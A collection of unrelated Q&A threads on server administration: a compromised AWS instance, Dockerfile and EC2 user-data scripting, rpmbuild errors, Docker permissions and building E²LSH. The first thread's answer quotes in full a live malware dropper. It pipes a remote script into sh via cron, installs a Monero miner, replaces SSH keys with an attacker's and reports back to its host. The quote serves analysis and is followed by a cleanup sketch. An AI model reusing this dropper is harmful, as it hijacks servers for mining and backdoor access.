I am using AWS, and for the last couple of days I have been seeing some unnecessary scripts running. A screenshot is attached below.
I tried to kill the process with sudo kill -9 {pId}, but was not able to do so.
Any suggestions?
Your box has been compromised.
The attack downloads a script to your server and runs it:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
echo "*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x#xmr.crypto-pool.fr:6666/xmr &" >> /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep gg2lady || nohup /opt/gg2lady &" >> /var/spool/cron/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/opt/yam/yam" ]; then
mkdir -p /opt/yam
curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
chmod +x /opt/yam/yam
# /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x#xmr.crypto-pool.fr:6666/xmr
fi
# if [ ! -f "/opt/gg2lady" ]; then
# curl -f -L https://r.chanstring.com/api/download/gg2lady_`uname -i` -o /opt/gg2lady
# chmod +x /opt/gg2lady
# fi
pkill gg2lady
yam=$(ps auxf | grep yam | grep -v grep | wc -l)
gg2lady=$(ps auxf | grep gg2lady | grep -v grep | wc -l)
cpu=$(cat /proc/cpuinfo | grep processor | wc -l)
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`
As you can see, it deletes all existing SSH authorized keys and installs a new one so the attackers can log in.
At the end, the script reports its status back to the same server:
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`
presumably so the attackers can keep track of all compromised servers at once.
Edit:
The domain is registered in Panama. Whoopsie. I think you should check your server and get some advice about its security.
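If you can still reach the box, a cleanup along these lines at least stops the miner from respawning. To be clear, this is only a sketch of undoing the persistence mechanisms visible in the script above; rebuilding the instance from a clean image is the only real fix, since you can't know what else was changed.

```shell
# Sketch only: undo the persistence the script above sets up.
# A full rebuild from a clean image is still the only safe option.

# 1. Remove the cron entry that re-downloads the payload every 2 minutes
rm -f /var/spool/cron/root

# 2. Remove the attacker's SSH key and the sshd_config line pointing at it
#    (also review the PermitRootLogin/PubkeyAuthentication lines it appended)
rm -f /root/.ssh/KHK75NEOiq
sed -i '/KHK75NEOiq/d' /etc/ssh/sshd_config
/etc/init.d/sshd restart

# 3. Kill the miner and delete its binary
pkill -f /opt/yam/yam
rm -rf /opt/yam
```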
I'm trying to create a Dockerfile that reads some URLs from an online file, but when I try to use wget with the URL in a variable, it fails. If I print the variables in a console message, the result is the correct URLs.
If the variables are declared with ENV or initialized directly with the URL, I have no problem using them in the wget; the problem only happens when the URLs are read from a file.
FROM openjdk:8
USER root
RUN mkdir /opt/tools /aplicaciones /deployments \
&& wget -q "www.url_online_file.com" -O url.txt \
&& while IFS== read -r name url; do if [ $name = "url1" ]; then export URL1=$url; fi; if [ $name = "url2" ]; then export URL2=$url; fi; done < url.txt \
&& echo "DEBUG URL1=$URL1"; echo "DEBUG URL2=$URL2"; \
&& wget -q $URL1 -O url1.zip
Error:
DEBUG URL1=www.prueba1.com
DEBUG URL2=www.prueba2.com
The command '/bin/sh -c mkdir /opt/tools /aplicaciones /deployments && wget -q "www.url_online_file.com" -O url.txt && while IFS== read -r name url; do if [ $name = "url1" ]; then export URL1=$url; fi; if [ $name = "url2" ]; then export URL2=$url; fi; done < url.txt && echo "DEBUG URL1=$URL1"; echo "DEBUG URL2=$URL2"; && wget -q $URL1 -O url1.zip' returned a non-zero code: 8
The structure of the online file is:
url1=www.prueba1.com
url2=www.prueba2.com
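For what it's worth, the name=url parsing itself works in a plain shell; a minimal reproduction outside Docker, using the values above. Note the loop reads from a redirect (done < file) rather than a pipe; a pipe would run the loop in a subshell and discard the variables.

```shell
# Minimal reproduction of the parsing step, outside Docker.
printf 'url1=www.prueba1.com\nurl2=www.prueba2.com\n' > url.txt

while IFS== read -r name url; do
    if [ "$name" = "url1" ]; then URL1=$url; fi
    if [ "$name" = "url2" ]; then URL2=$url; fi
done < url.txt   # redirect: loop runs in the current shell, variables survive

echo "URL1=$URL1"   # prints URL1=www.prueba1.com
echo "URL2=$URL2"   # prints URL2=www.prueba2.com
```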
The solution was to use wget -i with www.url_online_file.com and to change the file's content to:
www.prueba1.com
www.prueba2.com
The dockerfile:
FROM openjdk:8
USER root
RUN mkdir /opt/tools /aplicaciones /deployments \
&& wget -i "www.url_online_file.com" \
&& rm url* \
&& mv url1* url1.zip \
&& mv url2* url2.zip \
&& unzip url1.zip -d /opt/tools \
&& unzip url2.zip -d /opt/tools \
&& rm url1.zip \
&& rm url2.zip
I'm having trouble getting a bash script to run when I add it to the user data on an EC2 launch template. I've looked at suggestions and tried multiple approaches, including AWS's suggestion of using MIME multi-part in the script. I tried the #cloud-boothook directive, but it only runs parts of my script on boot. The interesting part is that once the instance is booted, I can run the script successfully by invoking it manually in /var/lib/cloud/instances/<instance-id>/user-data.txt. I'm not sure what else to try, so any help is appreciated. Below is my script.
#cloud-boothook
#!/bin/bash
apt-get update
pip install -I ansible==2.6.2
cd /tmp
wget https://dl.google.com/go/go1.11.linux-amd64.tar.gz
tar -xvf go1.11.linux-amd64.tar.gz
mv go /usr/lib
apt-get -y install checkinstall build-essential
apt-get -y install libreadline6-dev libncursesw5-dev libssl-dev libsqlite3-dev tk-dev libgdbm-dev libc6-dev libbz2-dev
cd /tmp
wget https://www.python.org/ftp/python/2.7.15/Python-2.7.15.tgz
tar -xvf Python-2.7.15.tgz
cd Python-2.7.15
./configure --prefix=/opt/python27myapp --enable-shared --enable-optimizations LDFLAGS=-Wl,-rpath=/opt/python27myapp/lib
make
checkinstall --pkgname=python27myapp --pkgversion=2.7.15 --pkgrelease=0 --nodoc --default make install
cd /tmp
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
/opt/python27myapp/bin/python /tmp/get-pip.py
/opt/python27myapp/bin/pip install --progress-bar=off virtualenv
set -euo pipefail
DEPLOYER="myapp"
PYTHON_DIST_PACKAGES="/usr/lib/python2.7/dist-packages"
PYTHON_SITE_PACKAGES="lib/python2.7/site-packages"
ANSIBLE_VENV_PATH="/mnt/ansible-12f"
ANSIBLE_USER="ansible"
ANSIBLE_VERSION="2.6.2.0"
ANSIBLE_USER_HOME="/home/${ANSIBLE_USER}"
TF_PLAYBOOK_REPO="git@github.com:myorg/${DEPLOYER}.git"
TF_PLAYBOOK_GITREF="2019.8.0"
TF_PLAYBOOK_OPTIONS="" # perhaps -vvvv
TF_PLAYBOOK_PATH="playbooks/twelve_factor/deploy.yml"
TF_APP_CONFIG_JSON="extra-vars.json"
TF_SCRATCH_DIR=$(mktemp -d -t tmp.XXXXXXXXXX)
TF_APP_CONFIG_PATH="${TF_SCRATCH_DIR}/config"
TF_ENVIRONMENT=""
EC2_INSTANCE_TAGS=""
CONFIG_BUCKET="databag-versions"
REGION=$(curl -s http://169.254.169.254/latest/dynamic/instance-identity/document | jq -c -r .region)
app_user="myapp"
git-with-ssm-key()
{
ssm_key="git_checkout_key"; shift
ssh-agent bash -o pipefail -c '
if aws ssm get-parameters \
--region "'$REGION'" \
--names "'$ssm_key'" \
--with-decryption \
--output text \
--query Parameters[0].Value |
ssh-add -k -
then
git "$@"
else
echo >&2 "ERROR: Failed to get or add key: '$ssm_key'"
exit 1
fi
' bash "$@"
}
#ssh-keyscan github.com >> ~/.ssh/known_hosts
# ============================================================================
cleanup() {
rm -rf $TF_SCRATCH_DIR
}
final_steps() {
cleanup
}
trap final_steps EXIT
# ============================================================================
install_packages() {
apt-get -y install jq
}
check_for_aws_cli() {
if ! aws help 1> /dev/null 2>&1; then
apt-get -y install awscli
fi
if ! aws help 1> /dev/null 2>&1; then
echo "The aws cli is not installed." 1>&2
exit 1
fi
echo "Found: $(aws --version 2>&1)"
}
application_deployed() {
[ -e "$TF_APP_HOME/current" ];
}
set_tf_app_home() {
TF_APP_HOME="$(jq .deploy_env.deploy_to $TF_APP_CONFIG_PATH | sed -e 's/^"//' -e 's/"$//')"
}
set_ec2_instance_tags() {
# We grab the EC2 tags of this instance.
instance_id=$(curl -s http://169.254.169.254/latest/meta-data/instance-id)
filters="Name=resource-id,Values=${instance_id}"
EC2_INSTANCE_TAGS=$(aws ec2 describe-tags --region $REGION --filters "${filters}" | jq .Tags)
}
set_tf_environment() {
# The tag whose Key is "Name" has the Value we want. Strip leading/trailing quotes.
name=$(echo "$EC2_INSTANCE_TAGS" | jq '.[] | select(.Key == "Environment") | .Value')
TF_ENVIRONMENT=$(echo $name | sed -e 's/^"//' -e 's/"$//')
}
set_config_bucket() {
case "$TF_ENVIRONMENT" in
innovate|production|bolt|operations|blackhat)
CONFIG_BUCKET="databag-versions"
;;
*)
CONFIG_BUCKET="databag-dev"
;;
esac
}
retrieve_configuration_source() {
# The tag whose Key is "Name" has the Value we want. Strip leading/trailing quotes.
selectName='.[] | select(.Key == "Name") | .Value'
name=$(echo "$EC2_INSTANCE_TAGS" | jq "$selectName" | sed -e 's/^"//' -e 's/"$//')
s3key="databags/$(echo $name | sed -e 's;-;/;g')"
aws s3 cp s3://${CONFIG_BUCKET}/${s3key} ${TF_APP_CONFIG_PATH}
set_git_ssh_key
set_tf_app_home
}
install_python() {
apt-get -y install python
pip install virtualenv
virtualenv $ANSIBLE_VENV_PATH
}
install_ansible() {
source ${ANSIBLE_VENV_PATH}/bin/activate
pip install ansible==${ANSIBLE_VERSION}
echo "$PYTHON_DIST_PACKAGES" > "${ANSIBLE_VENV_PATH}/${PYTHON_SITE_PACKAGES}/dist-packages.pth"
# This will go wrong if the system python path changes.
if [ ! -d "$PYTHON_DIST_PACKAGES" ]; then
echo "ERROR: the system python packages location does not exist: $PYTHON_DIST_PACKAGES"
exit 1
fi
# Having established a link between our vitualenv and the system python, we
# can now install python-apt.
pip install python-apt
}
add_playbook_user() {
if ! getent group $ANSIBLE_USER > /dev/null 2>&1; then
addgroup --system $ANSIBLE_USER
fi
if ! id -u $ANSIBLE_USER > /dev/null 2>&1; then
adduser --system --home $ANSIBLE_USER_HOME --shell /bin/false \
--ingroup $ANSIBLE_USER --disabled-password \
--gecos GECOS \
$ANSIBLE_USER
fi
if [ ! -d "$ANSIBLE_USER_HOME/.ssh" ]; then
mkdir $ANSIBLE_USER_HOME/.ssh
fi
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh
chmod 700 $ANSIBLE_USER_HOME/.ssh
echo "StrictHostKeyChecking no" > $ANSIBLE_USER_HOME/.ssh/config
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh/config
# echo ${GIT_SSH_KEY} > $ANSIBLE_USER_HOME/.ssh/id_rsa
echo $GIT_SSH_KEY | sed -e "s/-----BEGIN RSA PRIVATE KEY-----/&\n/" -e "s/-----END RSA PRIVATE KEY-----/\n&/" -e "s/\S\{64\}/&\n/g" > $ANSIBLE_USER_HOME/.ssh/id_rsa
chown ${ANSIBLE_USER}:${ANSIBLE_USER} $ANSIBLE_USER_HOME/.ssh/id_rsa
chmod 600 $ANSIBLE_USER_HOME/.ssh/id_rsa
if ! getent group $app_user > /dev/null 2>&1; then
addgroup --system $app_user
fi
if ! id -u $app_user > /dev/null 2>&1; then
adduser --system --home ${ANSIBLE_USER_HOME}/myapp --shell /bin/false \
--ingroup $app_user --disabled-password \
--gecos GECOS \
$app_user
fi
}
retrieve_playbook() {
rm -rf "${ANSIBLE_USER_HOME}/${DEPLOYER}"
(
cd "${ANSIBLE_USER_HOME}"
git-with-ssm-key /githubsshkeys/gitreader clone --branch "$TF_PLAYBOOK_GITREF" "$TF_PLAYBOOK_REPO"
)
chown -R ansible:ansible "${ANSIBLE_USER_HOME}/${DEPLOYER}"
}
patch_playbooks() {
awk '/^- name:/ {f=0} /^- name: Establish SSH credentials/ {f=1} !f;' ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app_user.yml > /tmp/temp_app_user.yml
cp /tmp/temp_app_user.yml ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app_user.yml # temp file is necessary since awk can't edit in-place
# remove the 'singleton' run operation... this isn't a singleton, and the playbook fails on the check to determine that.
sed -i 's/^.*singleton.*$//' ${ANSIBLE_USER_HOME}/myapp/playbooks/twelve_factor/app.yml
# fix the "invalid ioctl" warning, which is non-breaking but creates ugly warnings in the log
sed -i -e 's/mesg n .*true/tty -s \&\& mesg n/g' /root/.profile
# fix myapp user permissions in the /mnt/ansible-12f directories
chown -R myapp:myapp ${ANSIBLE_VENV_PATH}
# set up proper git SSH access for the ansible user
echo -e "host github.com\n HostName github.com\n IdentityFile ~/.ssh/id_rsa\n User git" >> $ANSIBLE_USER_HOME/.ssh/config
# set up the same git access for the myapp user
if [ ! -d "/mnt/myapp/.ssh" ]; then
mkdir -p /mnt/myapp/.ssh
fi
# ensure the directory will have the right permissions
mkdir -p /mnt/myapp/releases
cp ${ANSIBLE_USER_HOME}/.ssh/* /mnt/myapp/.ssh
chown -R ${app_user}:${app_user} /mnt/myapp
}
set_git_ssh_key() {
GIT_SSH_KEY="$(aws ssm get-parameters --region $REGION --names git_checkout_key --with-decryption --query Parameters[0].Value --output text)"
ssh-keyscan github.com >> ~/.ssh/known_hosts
}
write_inventory() {
IP_ADDRESS=$(curl -s http://169.254.169.254/latest/meta-data/local-ipv4)
cat - <<END_INVENTORY | sed -e 's/^ *//' > "${ANSIBLE_USER_HOME}/inventory"
[${IP_ADDRESS}]
${IP_ADDRESS} ansible_python_interpreter=${ANSIBLE_VENV_PATH}/bin/python
[linux]
${IP_ADDRESS}
# This bizarre group name will never be used anywhere.
# We need another group with an entry in it to avoid triggering
# the cmd_singleton section.
[12345_xx_%%%%_xxxx_]
10.10.10.10
END_INVENTORY
}
# Located in the directory in which ansible-playbook is executed; it is
# automatically picked up as Ansible runs.
write_ansible_settings() {
cat - <<END_SETTINGS | sed -e 's/^ *//' > "${ANSIBLE_USER_HOME}/ansible.cfg"
[defaults]
inventory = /etc/ansible/hosts
library = /usr/local/opt/ansible/libexec/lib/python2.7/site-packages/ansible/modules
remote_tmp = /tmp/.ansible-${USER}/tmp
pattern = *
forks = 5
poll_interval = 15
transport = smart
gathering = implicit
host_key_checking = False
# SSH timeout
timeout = 30
# we ssh as user medidata, becoming the 12-factor user, so:
# see https://docs.ansible.com/ansible/become.html#becoming-an-unprivileged-user
allow_world_readable_tmpfiles = True
ansible_managed = Ansible managed: {file} modified on %Y-%m-%d %H:%M:%S by {uid} on {host}
action_plugins = /usr/share/ansible_plugins/action_plugins
callback_plugins = /usr/share/ansible_plugins/callback_plugins
connection_plugins = /usr/share/ansible_plugins/connection_plugins
lookup_plugins = /usr/share/ansible_plugins/lookup_plugins
vars_plugins = /usr/share/ansible_plugins/vars_plugins
filter_plugins = /usr/share/ansible_plugins/filter_plugins
fact_caching = memory
retry_files_enabled = False
[ssh_connection]
# We have sometimes an error raised: Timeout (32s) waiting for privilege escalation prompt
# To avoid this, we make multiple attempts at the connection:
retries = 5
ssh_args = -o ControlMaster=auto -o ControlPersist=60s -o ServerAliveInterval=120
control_path = %(directory)s/%%h-%%r
pipelining = False
END_SETTINGS
}
write_deployment_config() {
cat - <<END_SETTINGS > "${ANSIBLE_USER_HOME}/${TF_APP_CONFIG_JSON}"
END_SETTINGS
}
run_deployment() {
write_inventory
write_ansible_settings
write_deployment_config
(
cd ${ANSIBLE_USER_HOME}
ansible-playbook "${DEPLOYER}/${TF_PLAYBOOK_PATH}" \
-i ${ANSIBLE_USER_HOME}/inventory \
"${DEPLOYER}/${TF_PLAYBOOK_PATH}" \
--connection=local \
--extra-vars @${TF_APP_CONFIG_PATH}
2> /tmp/ansible.err | tee /tmp/ansible.out
)
}
# -----------------------------------------------------
# ---------------- Script Starts Here -----------------
# -----------------------------------------------------
install_packages # do we need to check if packages already installed?
check_for_aws_cli
set_ec2_instance_tags
set_tf_environment
retrieve_configuration_source
if application_deployed; then
echo "Application already deployed; taking no action"
else
add_playbook_user
install_python
install_ansible
retrieve_playbook
patch_playbooks
run_deployment
fi
chown -R ${app_user}:${app_user} /mnt/myapp/services
chown -R ${app_user}:${app_user} /etc/sv/myapp*
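For reference, the MIME multi-part wrapping I tried (AWS's suggestion) looks roughly like this; the boundary string and part contents here are illustrative, not taken from my actual script:

```
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"

#!/bin/bash
echo "user data ran" >> /tmp/userdata-marker.txt
--//--
```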
I think you need to add sudo before every command.
Also, can you please share the error you are getting?
I solved the problem by removing set -euo pipefail from the script.
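That fits the symptoms: under set -e, the first command that exits non-zero silently aborts the rest of the user data, and under set -u any reference to an unset variable does the same. A tiny illustration (not my actual user data):

```shell
# Under `set -e`, the first command that exits non-zero aborts the whole
# script, so everything after it silently never runs.
sh -c '
set -eu
grep needle /dev/null   # matches nothing, exits 1
echo "never reached"    # set -e aborts before this line
'
echo "exit status: $?"  # prints: exit status: 1
```

When cloud-init runs such a script, there is no terminal to show the early exit, which makes it look like only "parts" of the script ran.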
I recently inherited a build server that was running fine until last week; now I'm getting some "file not found" errors. I build as the non-root user "rpmbuilder". When I run my build command I get the following errors:
$ rpmbuild -bb -v rpmbuild/SPECS/mist.spec
Executing(%prep): /bin/sh -e /var/tmp/rpm-tmp.fUrkkG
Executing(%install): /bin/sh -e /var/tmp/rpm-tmp.edkQrN
Processing files: mist-2.0.2-1.x86_64
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/config.pyc
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/mist_db.sql
error: File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/.password_complexity.conf
RPM build errors:
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/config.pyc
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/mist_db.sql
File not found: /home/rpmbuilder/rpmbuild/BUILDROOT/mist-2.0.2-1.x86_64/opt/mist/database/.password_complexity.conf
I used to get a ton of output under %prep but now there's nothing. I tried using %setup without -q and still get the same output.
As far as I can tell my source files are still where they should be:
[rpmbuilder@coams-db SOURCES]$ pwd
/home/rpmbuilder/rpmbuild/SOURCES
[rpmbuilder@coams-db SOURCES]$ ls -la
total 66124
drwxr-xr-x. 3 rpmbuilder rpmbuilder 4096 Jun 23 10:08 .
drwxr-xr-x. 8 rpmbuilder rpmbuilder 4096 Feb 25 2016 ..
drwxrwxr-x. 8 rpmbuilder rpmbuilder 4096 Jun 23 10:08 mist-2.0.2
-rw-rw-r--. 1 rpmbuilder rpmbuilder 67681925 Jun 23 10:09 mist-2.0.2.tar.gz
Has anyone seen this issue before? Are there some nitpicky things I didn't know to check? Like I said, I don't recall changing anything, but who knows...
My spec file is below:
Name: mist
Version: 2.0.2
Release: 1
Summary: <snip>
Group: <snip>
License: GPL
URL: http://<snip>
Source0: mist-2.0.2.tar.gz
BuildArch: x86_64
BuildRoot: /home/rpmbuilder/rpmbuild/%{name}-%{version}
Requires(pre): shadow-utils
Requires: python, mysql-server, python-sqlalchemy, MySQL-python, python-requests, python-lxml, pytz, python-jsonschema
%description
Installs the MIST application.
%pre
if [ $1 = 1 ]; then
getent group mist > /dev/null || groupadd -r mist
getent passwd mist > /dev/null || useradd -r -g mist -d /opt/mist -c "MIST Console User" mist -p '<snip>'
# echo "Starting Cron Setup........."
#echo "Create temp file to hold cron currnet data"
#%define tempFile `mktemp`
#store temp file name
#TEMP_FILE_NAME=%{tempFile}
#echo "Storing crontab current data in temp file %{tempFile}"
#CRON_OUT_FILE=`crontab -l > $TEMP_FILE_NAME`
#echo "Add required cron detalis in cron temp file"
#ADD_TO_CRON=`echo "#Schedule the following cron job to <snip>:" >> $TEMP_FILE_NAME`
#Replace the http://servername.com/file.php with file path or link
#ADD_TO_CRON=`echo "*/30 * * * * python /opt/mist/assets/pull_assets.py > /dev/null 2>&1" >> $TEMP_FILE_NAME`
#echo "Storing temp cron to the crontab"
#ADD_TEMP_TO_CRON=`crontab $TEMP_FILE_NAME`
#echo "Remove %{tempFile} temp file"
#rm -r -f $TEMP_FILE_NAME
#get current crontab list for email
#%define cornDataNow `crontab -l`
#exit 0
fi
if [ $1 = 2 ]; then
/sbin/service mist stop
#cp -r /opt/mist/frontend/server/conf /opt
#rm -rf /opt/mist/frontend/server/work
fi
%preun
if [ $1 = 0 ]; then
/sbin/service mist stop
fi
%prep
%setup -q
%install
# rm -rf "$RPM_BUILD_ROOT"
echo $RPM_BUILD_ROOT
mkdir -p "$RPM_BUILD_ROOT/opt/mist"
cp -R . "$RPM_BUILD_ROOT/opt/mist"
mkdir -p "$RPM_BUILD_ROOT/var/log/MIST"
exit 0
%files
%attr(750,mist,mist) /opt/mist
%attr(400,mist,mist) /opt/mist/database/config.pyc
%attr(640,mist,mist) /opt/mist/database/mist_db.sql
%attr(640,mist,mist) /opt/mist/database/.password_complexity.conf
#/opt/mist
%doc
%post
if [ $1 = 1 ]; then
mv /opt/mist/mist_base/mist /etc/init.d
chmod 755 /etc/init.d/mist
chkconfig --level 345 mist on
mv /opt/mist/database/my.cnf /etc
/usr/sbin/usermod -a -G mist mysql
/usr/sbin/setsebool allow_user_mysql_connect 1
/bin/mkdir -p /var/log/MIST/frontend
chown -R root.mist /var/log/MIST
chmod -R 775 /var/log/MIST
fi
if [ $1 = 2 ]; then
#cp -r /opt/conf /opt/mist/frontend/server
#rm -r /opt/conf
#rm /opt/mist/frontend/mist
if [ -d /opt/mist/frontend ]; then
rm -rf /opt/mist/frontend
fi
mv /opt/mist/mist_base/mist /etc/init.d
rm /opt/mist/database/my.cnf
/sbin/service mist start
fi
mv /opt/mist/mist_logging.py /usr/lib/python2.6/site-packages
chmod 644 /usr/lib/python2.6/site-packages/mist_logging.py
%postun
if [ $1 = 0 ]; then
/bin/rm -r /opt/mist
chkconfig --del mist
/bin/rm /etc/init.d/mist
/bin/rm /etc/my.cnf
/bin/rm /usr/lib/python2.6/site-packages/mist_logging.py
/bin/rm -r /var/log/MIST
/usr/sbin/userdel --force mist 2> /dev/null; true
/usr/sbin/groupdel mist
/sbin/service mysqld stop
/bin/rm -r /var/lib/mysql
/bin/sed -i '/mistDB/d' /etc/hosts
#/usr/bin/crontab -l | grep -v "#Schedule the following cron job to <snip>:" | /usr/bin/crontab -
#/usr/bin/crontab -l | grep -v "python /opt/mist/assets/pull_assets.py" | /usr/bin/crontab -
fi
%changelog
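One way to narrow this down is to confirm that the tarball still unpacks into the directory %setup -q expects; if its top-level directory no longer matches %{name}-%{version} (mist-2.0.2 here), %prep goes quiet and %install copies nothing into the buildroot. A quick check (paths assume the default ~/rpmbuild layout from the question):

```shell
# Check that the tarball unpacks into the directory %setup -q expects,
# i.e. a top-level mist-2.0.2/ matching %{name}-%{version}.
topdir=$(tar -tzf ~/rpmbuild/SOURCES/mist-2.0.2.tar.gz | head -1)
echo "top-level entry: $topdir"
case "$topdir" in
    mist-2.0.2/*|mist-2.0.2) echo "matches %{name}-%{version}" ;;
    *) echo "MISMATCH: %setup will unpack somewhere %install does not look" ;;
esac
```

If the directory name has drifted, either repack the tarball or tell %setup the real name with `%setup -q -n <dirname>`. Running `rpmbuild -bp SPECS/mist.spec` executes only the %prep stage, which makes it easier to see what, if anything, lands under BUILD/.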
In the Dockerfile below, I am only able to give the first user read, write, and execute access to the export folder.
...
VOLUME ["/export/"]
RUN groupadd galaxy \
&& chgrp -R galaxy /export \
&& chmod -R 770 /export
RUN useradd dudleyk \
&& mkdir /home/dudleyk \
&& chown dudleyk:dudleyk /home/dudleyk \
&& addgroup dudleyk galaxy \
&& ln -s /export/ /home/dudleyk/ \
&& echo "dudleyk:dudleyk" | chpasswd
RUN useradd lorencm \
&& mkdir /home/lorencm \
&& chown lorencm:lorencm /home/lorencm \
&& addgroup lorencm galaxy \
&& ln -s /export/ /home/lorencm/ \
&& echo "lorencm:lorencm" | chpasswd
EXPOSE 8787
CMD ["/init"]
I logged into the Docker container with docker run -it -v /home/galaxy:/export rstudio bash, and it showed me the following:
ls -ahl
drwxr-xr-x 43 dudleyk galaxy 4.0K Apr 8 00:09 export
How do I give the second user read, write, and execute access to /export?
Thank you in advance.
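In case it helps, here is what I expected the chmod -R 770 to produce, checked unprivileged outside Docker. One thing I noticed while testing: with -v /home/galaxy:/export, the mounted directory seems to reflect the host path's owner and mode (hence the drwxr-xr-x above), so the image-time chmod/chgrp on /export may simply be overridden by the mount.

```shell
# Unprivileged check of what mode 770 means: owner and group get rwx,
# others get nothing. The temp dir stands in for /export.
d=$(mktemp -d)
chmod 770 "$d"
stat -c '%A %a' "$d"    # prints: drwxrwx--- 770

# Inside the container the group bits only help a user who is actually
# in the galaxy group; `id lorencm` should list galaxy.
```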
I am trying to use E²LSH; here is the manual. When untarred, the folder of this library has a Makefile, a bin folder and a source folder (among other things).
In the source folder there is LSHMain.cpp, which I have to modify.
I deleted the project (just to make sure I hadn't destroyed something), re-downloaded it, modified the file and then ran make, but when I run the executable it is as if all my modifications are gone and only the original code is taken into account!
This happens whether or not I build the project from scratch.
I suspect this has to do with the scripts inside the bin folder, because I have to run it like this:
bin/lsh argument_list
What should I change?
Here is the Makefile (reduced, since some stuff is irrelevant)
SOURCES_DIR:=sources
OBJ_DIR:=bin
OUT_DIR:=bin
TEST_DIR:=$(SOURCES_DIR)
#H_SOURCES:=`find $(SOURCES_DIR) -name "*.h"`
#CPP_SOURCES:=`find $(SOURCES_DIR) -name "*.cpp"`
#TEST_SOURCES:=`find $(TEST_DIR) -name "*.cpp"`
OBJ_SOURCES:=$(SOURCES_DIR)/BucketHashing.cpp \
$(SOURCES_DIR)/Geometry.cpp \
$(SOURCES_DIR)/LocalitySensitiveHashing.cpp \
$(SOURCES_DIR)/Random.cpp \
$(SOURCES_DIR)/Util.cpp \
$(SOURCES_DIR)/GlobalVars.cpp \
$(SOURCES_DIR)/SelfTuning.cpp \
$(SOURCES_DIR)/NearNeighbors.cpp
LSH_BUILD:=LSHMain
TEST_BUILDS:=exactNNs \
genDS \
compareOutputs \
genPlantedDS
GCC:=g++
OPTIONS:=-O3 -DREAL_FLOAT -DDEBUG
# -march=athlon -msse -mfpmath=sse
LIBRARIES:=-lm
#-ldmalloc
all:
bin/compile
c: compile
compile:
#mkdir -p $(OUT_DIR)
$(GCC) -o $(OUT_DIR)/$(LSH_BUILD) $(OPTIONS) $(OBJ_SOURCES) $(SOURCES_DIR)/$(LSH_BUILD).cpp $(LIBRARIES)
chmod g+rwx $(OUT_DIR)/$(LSH_BUILD)
and here are the compile and lsh scripts (both inside the bin folder; the Makefile is in the same directory as the source and bin folders):
#!/bin/bash
OUT_DIR=bin
SOURCES_DIR=sources
OBJ_SOURCES="$SOURCES_DIR/BucketHashing.cpp \
$SOURCES_DIR/Geometry.cpp \
$SOURCES_DIR/LocalitySensitiveHashing.cpp \
$SOURCES_DIR/Random.cpp \
$SOURCES_DIR/Util.cpp \
$SOURCES_DIR/GlobalVars.cpp \
$SOURCES_DIR/SelfTuning.cpp \
$SOURCES_DIR/NearNeighbors.cpp"
TEST_BUILDS="exactNNs \
genDS \
compareOutputs \
genPlantedDS"
defineFloat=REAL_FLOAT
g++ -o $OUT_DIR/testFloat -DREAL_FLOAT $OBJ_SOURCES $SOURCES_DIR/testFloat.cpp -lm >/dev/null 2>&1 || defineFloat=REAL_DOUBLE
OPTIONS="-O3 -D$defineFloat"
